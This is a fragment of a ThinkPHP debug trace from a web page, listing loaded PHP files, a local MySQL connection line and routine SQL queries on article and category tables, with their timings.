  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000686s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.001385s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.000559s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.001293s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.001242s ]
  6. SELECT * FROM `set` [ RunTime:0.007213s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.001506s ]
  8. SELECT * FROM `article` WHERE `id` = 491574 LIMIT 1 [ RunTime:0.002132s ]
  9. UPDATE `article` SET `lasttime` = 1783048640 WHERE `id` = 491574 [ RunTime:0.018810s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000590s ]
  11. SELECT * FROM `article` WHERE `id` < 491574 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.007537s ]
  12. SELECT * FROM `article` WHERE `id` > 491574 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.017819s ]
  13. SELECT * FROM `article` WHERE `id` < 491574 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.081886s ]
  14. SELECT * FROM `article` WHERE `id` < 491574 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.013384s ]
  15. SELECT * FROM `article` WHERE `id` < 491574 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.047760s ]
0.334707s